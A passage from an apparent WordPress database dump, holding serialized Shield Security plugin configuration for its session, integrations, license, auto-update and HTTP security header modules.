Started\";s:16:\"last_activity_at\";s:12:\"Last Seen At\";s:11:\"secadmin_at\";s:28:\"Security Admin Authenticated\";}}s:6:\"events\";a:4:{s:13:\"session_start\";a:2:{s:12:\"audit_params\";a:2:{i:0;s:10:\"user_login\";i:1;s:10:\"session_id\";}s:5:\"level\";s:4:\"info\";}s:17:\"session_terminate\";a:1:{s:5:\"level\";s:4:\"info\";}s:25:\"session_terminate_current\";a:3:{s:12:\"audit_params\";a:2:{i:0;s:10:\"user_login\";i:1;s:10:\"session_id\";}s:5:\"level\";s:4:\"info\";s:6:\"recent\";b:1;}s:13:\"login_success\";a:3:{s:5:\"level\";s:4:\"info\";s:7:\"offense\";b:0;s:4:\"stat\";b:0;}}}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510358,'_site_transient_timeout_shield_mod_config_integrations','1632920474','no'),(510359,'_site_transient_shield_mod_config_integrations','a:7:{s:4:\"slug\";s:12:\"integrations\";s:10:\"properties\";a:16:{s:4:\"slug\";s:12:\"integrations\";s:11:\"storage_key\";s:12:\"integrations\";s:4:\"name\";s:12:\"Integrations\";s:10:\"menu_title\";s:12:\"Integrations\";s:12:\"sidebar_name\";s:12:\"Integrations\";s:19:\"show_module_options\";b:1;s:21:\"show_module_menu_item\";b:0;s:12:\"auto_enabled\";b:0;s:12:\"show_central\";b:1;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:12:\"run_if_wpcli\";b:1;s:19:\"run_if_verified_bot\";b:1;s:14:\"skip_processor\";b:0;s:16:\"tracking_exclude\";b:0;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:1;}s:8:\"sections\";a:4:{i:0;a:5:{s:4:\"slug\";s:20:\"section_integrations\";s:7:\"primary\";b:1;s:5:\"title\";s:12:\"Integrations\";s:11:\"title_short\";s:12:\"Integrations\";s:9:\"beacon_id\";i:404;}i:1;a:4:{s:4:\"slug\";s:12:\"section_spam\";s:5:\"title\";s:14:\"SPAM Detection\";s:11:\"title_short\";s:14:\"SPAM Detection\";s:9:\"beacon_id\";i:138;}i:2;a:4:{s:4:\"slug\";s:18:\"section_user_forms\";s:5:\"title\";s:24:\"User Forms Bot Detection\";s:11:\"title_short\";s:24:\"User Forms Bot Detection\";s:9:\"beacon_id\";i:239;}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:3:{s:13:\"enable_mainwp\";a:10:{s:3:\"key\";s:13:\"enable_mainwp\";s:7:\"section\";s:20:\"section_integrations\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/ir\";s:9:\"link_blog\";s:19:\"https://shsec.io/ke\";s:9:\"beacon_id\";i:404;s:4:\"name\";s:13:\"Enable MainWP\";s:7:\"summary\";s:36:\"Enable The Built-In MainWP Extension\";s:11:\"description\";s:86:\"This option will enable Shield\'s built-in MainWP extension for both server and client.\";}s:19:\"form_spam_providers\";a:13:{s:3:\"key\";s:19:\"form_spam_providers\";s:7:\"section\";s:12:\"section_spam\";s:7:\"premium\";b:1;s:8:\"advanced\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:13:{i:0;a:2:{s:9:\"value_key\";s:12:\"contactform7\";s:4:\"text\";s:14:\"Contact Form 7\";}i:1;a:2:{s:9:\"value_key\";s:12:\"elementorpro\";s:4:\"text\";s:13:\"Elementor Pro\";}i:2;a:2:{s:9:\"value_key\";s:11:\"fluentforms\";s:4:\"text\";s:12:\"Fluent Forms\";}i:3;a:2:{s:9:\"value_key\";s:15:\"formidableforms\";s:4:\"text\";s:16:\"Formidable Forms\";}i:4;a:2:{s:9:\"value_key\";s:10:\"forminator\";s:4:\"text\";s:10:\"Forminator\";}i:5;a:2:{s:9:\"value_key\";s:12:\"gravityforms\";s:4:\"text\";s:13:\"Gravity Forms\";}i:6;a:2:{s:9:\"value_key\";s:10:\"groundhogg\";s:4:\"text\";s:10:\"Groundhogg\";}i:7;a:2:{s:9:\"value_key\";s:9:\"kaliforms\";s:4:\"text\";s:10:\"Kali Forms\";}i:8;a:2:{s:9:\"value_key\";s:10:\"ninjaforms\";s:4:\"text\";s:11:\"Ninja Forms\";}i:9;a:2:{s:9:\"value_key\";s:10:\"superforms\";s:4:\"text\";s:11:\"Super Forms\";}i:10;a:2:{s:9:\"value_key\";s:12:\"supportcandy\";s:4:\"text\";s:13:\"Support Candy\";}i:11;a:2:{s:9:\"value_key\";s:6:\"wpforo\";s:4:\"text\";s:6:\"wpForo\";}i:12;a:2:{s:9:\"value_key\";s:7:\"wpforms\";s:4:\"text\";s:7:\"WPForms\";}}s:9:\"link_info\";s:19:\"https://shsec.io/k2\";s:9:\"link_blog\";s:19:\"https://shsec.io/k3\";s:9:\"beacon_id\";i:138;s:4:\"name\";s:18:\"SPAM Form Checking\";s:7:\"summary\";s:57:\"Select The Form Providers That Should Be Checked For SPAM\";s:11:\"description\";s:58:\"Select The Form Providers That Should Be Checked For SPAM.\";}s:19:\"user_form_providers\";a:13:{s:3:\"key\";s:19:\"user_form_providers\";s:7:\"section\";s:18:\"section_user_forms\";s:7:\"premium\";b:1;s:8:\"advanced\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:1:{i:0;s:9:\"wordpress\";}s:13:\"value_options\";a:12:{i:0;a:2:{s:9:\"value_key\";s:9:\"buddyboss\";s:4:\"text\";s:9:\"BuddyBoss\";}i:1;a:2:{s:9:\"value_key\";s:10:\"buddypress\";s:4:\"text\";s:10:\"BuddyPress\";}i:2;a:2:{s:9:\"value_key\";s:20:\"easydigitaldownloads\";s:4:\"text\";s:22:\"Easy Digital Downloads\";}i:3;a:2:{s:9:\"value_key\";s:10:\"learnpress\";s:4:\"text\";s:10:\"LearnPress\";}i:4;a:2:{s:9:\"value_key\";s:9:\"lifterlms\";s:4:\"text\";s:9:\"LifterLMS\";}i:5;a:2:{s:9:\"value_key\";s:11:\"memberpress\";s:4:\"text\";s:11:\"MemberPress\";}i:6;a:2:{s:9:\"value_key\";s:23:\"paidmembersubscriptions\";s:4:\"text\";s:25:\"Paid Member Subscriptions\";}i:7;a:2:{s:9:\"value_key\";s:14:\"profilebuilder\";s:4:\"text\";s:15:\"Profile Builder\";}i:8;a:2:{s:9:\"value_key\";s:14:\"ultimatemember\";s:4:\"text\";s:15:\"Ultimate Member\";}i:9;a:2:{s:9:\"value_key\";s:11:\"woocommerce\";s:4:\"text\";s:11:\"WooCommerce\";}i:10;a:2:{s:9:\"value_key\";s:9:\"wordpress\";s:4:\"text\";s:9:\"WordPress\";}i:11;a:2:{s:9:\"value_key\";s:9:\"wpmembers\";s:4:\"text\";s:10:\"WP Members\";}}s:9:\"link_info\";s:19:\"https://shsec.io/k4\";s:9:\"link_blog\";s:19:\"https://shsec.io/k3\";s:9:\"beacon_id\";i:239;s:4:\"name\";s:18:\"User Form Checking\";s:7:\"summary\";s:87:\"Select The User Form Providers That Should Be Checked For SPAM Registrations and Logins\";s:11:\"description\";s:87:\"Select The User Form Providers That Should Be Checked For SPAM Registrations and Logins\";}}s:11:\"definitions\";a:1:{s:6:\"events\";a:4:{s:14:\"spam_form_pass\";a:5:{s:12:\"audit_params\";a:1:{i:0;s:13:\"form_provider\";}s:5:\"level\";s:4:\"info\";s:4:\"stat\";b:1;s:5:\"audit\";b:1;s:7:\"offense\";b:0;}s:14:\"spam_form_fail\";a:5:{s:12:\"audit_params\";a:1:{i:0;s:13:\"form_provider\";}s:5:\"level\";s:7:\"warning\";s:4:\"stat\";b:1;s:5:\"audit\";b:1;s:7:\"offense\";b:0;}s:18:\"user_form_bot_pass\";a:5:{s:12:\"audit_params\";a:3:{i:0;s:13:\"form_provider\";i:1;s:6:\"action\";i:2;s:8:\"username\";}s:5:\"level\";s:4:\"info\";s:4:\"stat\";b:1;s:5:\"audit\";b:1;s:7:\"offense\";b:0;}s:18:\"user_form_bot_fail\";a:5:{s:12:\"audit_params\";a:3:{i:0;s:13:\"form_provider\";i:1;s:6:\"action\";i:2;s:8:\"username\";}s:5:\"level\";s:7:\"warning\";s:4:\"stat\";b:1;s:5:\"audit\";b:1;s:7:\"offense\";b:1;}}}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510360,'_site_transient_timeout_shield_mod_config_license','1632920474','no'),(510361,'_site_transient_shield_mod_config_license','a:9:{s:4:\"slug\";s:7:\"license\";s:10:\"properties\";a:14:{s:4:\"slug\";s:7:\"license\";s:4:\"name\";s:12:\"Pro Security\";s:10:\"menu_title\";s:0:\"\";s:21:\"show_module_menu_item\";b:0;s:19:\"highlight_menu_item\";b:1;s:7:\"tagline\";s:44:\"The Best In WordPress Security, Only Better.\";s:12:\"auto_enabled\";b:1;s:11:\"storage_key\";s:7:\"license\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;}s:13:\"admin_notices\";a:1:{s:19:\"wphashes-token-fail\";a:6:{s:2:\"id\";s:19:\"wphashes-token-fail\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:1;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:5:\"error\";}}s:10:\"menu_items\";a:1:{i:0;a:3:{s:5:\"title\";s:7:\"Go PRO!\";s:4:\"slug\";s:12:\"pro-redirect\";s:9:\"highlight\";b:1;}}s:16:\"custom_redirects\";a:1:{i:0;a:3:{s:15:\"source_mod_page\";s:12:\"pro-redirect\";s:15:\"target_mod_page\";s:8:\"insights\";s:10:\"query_args\";a:1:{s:4:\"inav\";s:7:\"license\";}}}s:8:\"sections\";a:1:{i:0;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:12:{s:11:\"license_key\";a:6:{s:3:\"key\";s:11:\"license_key\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}s:20:\"license_activated_at\";a:5:{s:3:\"key\";s:20:\"license_activated_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}s:22:\"license_deactivated_at\";a:5:{s:3:\"key\";s:22:\"license_deactivated_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}s:23:\"license_last_checked_at\";a:5:{s:3:\"key\";s:23:\"license_last_checked_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}s:26:\"last_warning_email_sent_at\";a:5:{s:3:\"key\";s:26:\"last_warning_email_sent_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}s:30:\"last_deactivated_email_sent_at\";a:5:{s:3:\"key\";s:30:\"last_deactivated_email_sent_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}s:11:\"last_errors\";a:5:{s:3:\"key\";s:11:\"last_errors\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";s:0:\"\";}s:13:\"last_error_at\";a:6:{s:3:\"key\";s:13:\"last_error_at\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}s:22:\"keyless_handshake_hash\";a:6:{s:3:\"key\";s:22:\"keyless_handshake_hash\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}s:23:\"keyless_handshake_until\";a:6:{s:3:\"key\";s:23:\"keyless_handshake_until\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}s:12:\"license_data\";a:6:{s:3:\"key\";s:12:\"license_data\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}s:18:\"wphashes_api_token\";a:5:{s:3:\"key\";s:18:\"wphashes_api_token\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:10:{s:21:\"license_store_url_api\";s:59:\"https://api.getshieldsecurity.com/wp-json/odp-eddkeyless/v1\";s:10:\"keyless_cp\";s:19:\"https://shsec.io/c5\";s:17:\"license_item_name\";s:19:\"Shield Security Pro\";s:15:\"license_item_id\";s:4:\"6047\";s:20:\"license_item_name_sc\";s:40:\"Shield Security Pro (via Shield Central)\";s:22:\"lic_verify_expire_days\";i:7;s:28:\"lic_verify_expire_grace_days\";i:3;s:7:\"keyless\";b:1;s:24:\"keyless_handshake_expire\";i:90;s:6:\"events\";a:3:{s:17:\"lic_check_success\";a:2:{s:5:\"level\";s:5:\"debug\";s:4:\"stat\";b:0;}s:14:\"lic_fail_email\";a:2:{s:5:\"level\";s:7:\"warning\";s:4:\"stat\";b:0;}s:19:\"lic_fail_deactivate\";a:2:{s:5:\"level\";s:7:\"warning\";s:4:\"stat\";b:0;}}}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510362,'_site_transient_timeout_shield_mod_config_autoupdates','1632920474','no'),(510363,'_site_transient_shield_mod_config_autoupdates','a:6:{s:4:\"slug\";s:11:\"autoupdates\";s:10:\"properties\";a:14:{s:4:\"slug\";s:11:\"autoupdates\";s:4:\"name\";s:17:\"Automatic Updates\";s:12:\"sidebar_name\";s:12:\"Auto Updates\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:11:\"autoupdates\";s:7:\"tagline\";s:53:\"Take back full control of WordPress automatic updates\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;s:5:\"order\";i:60;}s:8:\"sections\";a:4:{i:0;a:6:{s:4:\"slug\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"primary\";b:1;s:5:\"title\";s:42:\"Automatic Updates For WordPress Components\";s:11:\"title_short\";s:20:\"WordPress Components\";s:9:\"beacon_id\";i:236;s:7:\"summary\";a:2:{i:0;s:80:\"Purpose - Control how automatic updates for each WordPress component is handled.\";i:1;s:80:\"Recommendation - You should at least allow minor updates for the WordPress core.\";}}i:1;a:5:{s:4:\"slug\";s:15:\"section_options\";s:5:\"title\";s:19:\"Auto-Update Options\";s:11:\"title_short\";s:19:\"Auto-Update Options\";s:9:\"beacon_id\";i:234;s:7:\"summary\";s:77:\"Purpose - Make adjustments to how automatic updates are handled on your site.\";}i:2;a:5:{s:4:\"slug\";s:55:\"section_enable_plugin_feature_automatic_updates_control\";s:5:\"title\";s:32:\"Enable Module: Automatic Updates\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:234;s:7:\"summary\";a:2:{i:0;s:137:\"Purpose - Automatic Updates lets you manage the WordPress automatic updates engine so you choose what exactly gets updated automatically.\";i:1;s:62:\"Recommendation - Keep the Automatic Updates feature turned on.\";}}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:11:{s:18:\"enable_autoupdates\";a:11:{s:3:\"key\";s:18:\"enable_autoupdates\";s:7:\"section\";s:55:\"section_enable_plugin_feature_automatic_updates_control\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3w\";s:9:\"link_blog\";s:19:\"https://shsec.io/hj\";s:9:\"beacon_id\";i:234;s:4:\"name\";s:24:\"Enable Automatic Updates\";s:7:\"summary\";s:48:\"Enable (or Disable) The Automatic Updates module\";s:11:\"description\";s:76:\"Un-Checking this option will completely disable the Automatic Updates module\";}s:29:\"enable_autoupdate_disable_all\";a:11:{s:3:\"key\";s:29:\"enable_autoupdate_disable_all\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3v\";s:9:\"link_blog\";s:19:\"https://shsec.io/k6\";s:9:\"beacon_id\";i:405;s:4:\"name\";s:11:\"Disable All\";s:7:\"summary\";s:46:\"Completely Disable WordPress Automatic Updates\";s:11:\"description\";s:122:\"When selected, regardless of any other settings, all WordPress automatic updates on this site will be completely disabled!\";}s:15:\"autoupdate_core\";a:11:{s:3:\"key\";s:15:\"autoupdate_core\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"default\";s:10:\"core_minor\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:10:\"core_never\";s:4:\"text\";s:5:\"Never\";}i:1;a:2:{s:9:\"value_key\";s:10:\"core_minor\";s:4:\"text\";s:19:\"Minor Versions Only\";}i:2;a:2:{s:9:\"value_key\";s:10:\"core_major\";s:4:\"text\";s:24:\"Major and Minor Versions\";}}s:9:\"link_info\";s:19:\"https://shsec.io/k5\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:237;s:4:\"name\";s:22:\"WordPress Core Updates\";s:7:\"summary\";s:66:\"Decide how the WordPress Core will automatically update, if at all\";s:11:\"description\";s:94:\"At least automatically upgrading minor versions is recommended (and is the WordPress default).\";}s:25:\"enable_autoupdate_plugins\";a:9:{s:3:\"key\";s:25:\"enable_autoupdate_plugins\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:7:\"Plugins\";s:7:\"summary\";s:28:\"Automatically Update Plugins\";s:11:\"description\";s:73:\"Note: Automatic updates for plugins are disabled on WordPress by default.\";}s:24:\"enable_autoupdate_themes\";a:10:{s:3:\"key\";s:24:\"enable_autoupdate_themes\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:6:\"Themes\";s:7:\"summary\";s:27:\"Automatically Update Themes\";s:11:\"description\";s:72:\"Note: Automatic updates for themes are disabled on WordPress by default.\";}s:12:\"update_delay\";a:11:{s:3:\"key\";s:12:\"update_delay\";s:7:\"section\";s:15:\"section_options\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"0\";s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/e5\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:137;s:4:\"name\";s:12:\"Update Delay\";s:7:\"summary\";s:47:\"Delay Automatic Updates For Period Of Stability\";s:11:\"description\";s:94:\"Shield will delay upgrades until the new update has been available for the set number of days.\";}s:22:\"autoupdate_plugin_self\";a:12:{s:3:\"key\";s:22:\"autoupdate_plugin_self\";s:7:\"section\";s:15:\"section_options\";s:8:\"advanced\";b:1;s:7:\"default\";s:4:\"auto\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:4:\"auto\";s:4:\"text\";s:21:\"Let The Plugin Decide\";}i:1;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:2;a:2:{s:9:\"value_key\";s:9:\"immediate\";s:4:\"text\";s:19:\"As Soon As Possible\";}}s:9:\"link_info\";s:19:\"https://shsec.io/3x\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:409;s:4:\"name\";s:18:\"Auto Update Plugin\";s:7:\"summary\";s:39:\"Always Automatically Update This Plugin\";s:11:\"description\";s:73:\"Regardless of any other settings, automatically update the Shield plugin.\";}s:33:\"enable_upgrade_notification_email\";a:9:{s:3:\"key\";s:33:\"enable_upgrade_notification_email\";s:7:\"section\";s:15:\"section_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Send Report Email\";s:7:\"summary\";s:42:\"Send email notices after automatic updates\";s:11:\"description\";s:81:\"You can turn on/off email notices from automatic updates by un/checking this box.\";}s:22:\"override_email_address\";a:10:{s:3:\"key\";s:22:\"override_email_address\";s:7:\"section\";s:15:\"section_options\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Report Email Address\";s:7:\"summary\";s:42:\"Where to send upgrade notification reports\";s:11:\"description\";s:65:\"If this is empty, it will default to the Site Admin email address\";}s:14:\"delay_tracking\";a:6:{s:3:\"key\";s:14:\"delay_tracking\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}s:16:\"selected_plugins\";a:5:{s:3:\"key\";s:16:\"selected_plugins\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:1:{s:20:\"action_hook_priority\";i:1000;}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510364,'_site_transient_timeout_shield_mod_config_headers','1632920474','no'),(510365,'_site_transient_shield_mod_config_headers','a:5:{s:4:\"slug\";s:7:\"headers\";s:10:\"properties\";a:14:{s:4:\"slug\";s:7:\"headers\";s:4:\"name\";s:12:\"HTTP Headers\";s:12:\"sidebar_name\";s:12:\"HTTP Headers\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:7:\"headers\";s:7:\"tagline\";s:29:\"Control HTTP Security Headers\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:80;}s:8:\"sections\";a:4:{i:0;a:6:{s:7:\"primary\";b:1;s:4:\"slug\";s:24:\"section_security_headers\";s:5:\"title\";s:25:\"Advanced Security Headers\";s:11:\"title_short\";s:16:\"Security Headers\";s:9:\"beacon_id\";i:267;s:7:\"summary\";a:2:{i:0;s:92:\"Purpose - Protect visitors to your site by implementing increased security response headers.\";i:1;s:101:\"Recommendation - Enabling these features are advised, but you must test them on your site thoroughly.\";}}i:1;a:5:{s:4:\"slug\";s:31:\"section_content_security_policy\";s:5:\"title\";s:23:\"Content Security Policy\";s:11:\"title_short\";s:23:\"Content Security Policy\";s:9:\"beacon_id\";i:155;s:7:\"summary\";a:2:{i:0;s:105:\"Purpose - Restrict the sources and types of content that may be loaded and processed by visitor browsers.\";i:1;s:101:\"Recommendation - Enabling these features are advised, but you must test them on your site thoroughly.\";}}i:2;a:5:{s:4:\"slug\";s:37:\"section_enable_plugin_feature_headers\";s:5:\"title\";s:27:\"Enable Module: HTTP Headers\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:265;s:7:\"summary\";a:2:{i:0;s:92:\"Purpose - Protect visitors to your site by implementing increased security response headers.\";i:1;s:101:\"Recommendation - Enabling these features are advised, but you must test them on your site thoroughly.\";}}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:7:{s:14:\"enable_headers\";a:11:{s:3:\"key\";s:14:\"enable_headers\";s:7:\"section\";s:37:\"section_enable_plugin_feature_headers\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/aj\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:9:\"beacon_id\";i:265;s:4:\"name\";s:19:\"Enable HTTP Headers\";s:7:\"summary\";s:43:\"Enable (or Disable) The HTTP Headers module\";s:11:\"description\";s:71:\"Un-Checking this option will completely disable the HTTP Headers module\";}s:7:\"x_frame\";a:10:{s:3:\"key\";s:7:\"x_frame\";s:7:\"section\";s:24:\"section_security_headers\";s:7:\"default\";s:13:\"on_sameorigin\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:3:\"off\";s:4:\"text\";s:24:\"Off: iFrames Not Blocked\";}i:1;a:2:{s:9:\"value_key\";s:13:\"on_sameorigin\";s:4:\"text\";s:36:\"On: Allow iFrames On The Same Domain\";}i:2;a:2:{s:9:\"value_key\";s:7:\"on_deny\";s:4:\"text\";s:21:\"On: Block All iFrames\";}}s:9:\"link_info\";s:19:\"https://shsec.io/78\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:4:\"name\";s:13:\"Block iFrames\";s:7:\"summary\";s:33:\"Block Remote iFrames Of This Site\";s:11:\"description\";s:139:\"The setting prevents any external website from embedding your site in an iFrame. This is useful for preventing so-called ClickJack attacks.\";}s:13:\"x_xss_protect\";a:9:{s:3:\"key\";s:13:\"x_xss_protect\";s:7:\"section\";s:24:\"section_security_headers\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/79\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:4:\"name\";s:14:\"XSS Protection\";s:7:\"summary\";s:38:\"Employ Built-In Browser XSS Protection\";s:11:\"description\";s:80:\"Directs compatible browsers to block what they detect as Reflective XSS attacks.\";}s:14:\"x_content_type\";a:9:{s:3:\"key\";s:14:\"x_content_type\";s:7:\"section\";s:24:\"section_security_headers\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/7a\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:4:\"name\";s:18:\"Prevent Mime-Sniff\";s:7:\"summary\";s:27:\"Turn-Off Browser Mime-Sniff\";s:11:\"description\";s:60:\"Reduces visitor exposure to malicious user-uploaded content.\";}s:17:\"x_referrer_policy\";a:11:{s:3:\"key\";s:17:\"x_referrer_policy\";s:7:\"section\";s:24:\"section_security_headers\";s:9:\"sensitive\";b:0;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:10:\"unsafe-url\";s:13:\"value_options\";a:10:{i:0;a:2:{s:9:\"value_key\";s:10:\"unsafe-url\";s:4:\"text\";s:45:\"Default: Full Referrer URL (aka \'Unsafe URL\')\";}i:1;a:2:{s:9:\"value_key\";s:11:\"no-referrer\";s:4:\"text\";s:11:\"No Referrer\";}i:2;a:2:{s:9:\"value_key\";s:26:\"no-referrer-when-downgrade\";s:4:\"text\";s:26:\"No Referrer When Downgrade\";}i:3;a:2:{s:9:\"value_key\";s:11:\"same-origin\";s:4:\"text\";s:11:\"Same Origin\";}i:4;a:2:{s:9:\"value_key\";s:6:\"origin\";s:4:\"text\";s:6:\"Origin\";}i:5;a:2:{s:9:\"value_key\";s:13:\"strict-origin\";s:4:\"text\";s:13:\"Strict Origin\";}i:6;a:2:{s:9:\"value_key\";s:24:\"origin-when-cross-origin\";s:4:\"text\";s:24:\"Origin When Cross-Origin\";}i:7;a:2:{s:9:\"value_key\";s:31:\"strict-origin-when-cross-origin\";s:4:\"text\";s:31:\"Strict Origin When Cross-Origin\";}i:8;a:2:{s:9:\"value_key\";s:5:\"empty\";s:4:\"text\";s:12:\"Empty Header\";}i:9;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:33:\"Disabled - Don\'t Send This Header\";}}s:9:\"link_info\";s:19:\"https://shsec.io/a5\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Referrer Policy\";s:7:\"summary\";s:22:\"Referrer Policy Header\";s:11:\"description\";s:141:\"The Referrer Policy Header allows you to control when and what referral information a browser may pass along with links clicked on your site.\";}s:32:\"enable_x_content_security_policy\";a:11:{s:3:\"key\";s:32:\"enable_x_content_security_policy\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/7d\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:9:\"beacon_id\";i:155;s:4:\"name\";s:30:\"Enable Content Security Policy\";s:7:\"summary\";s:54:\"Enable (or Disable) The Content Security Policy module\";s:11:\"description\";s:75:\"Allows for permission and restriction of all resources loaded on your 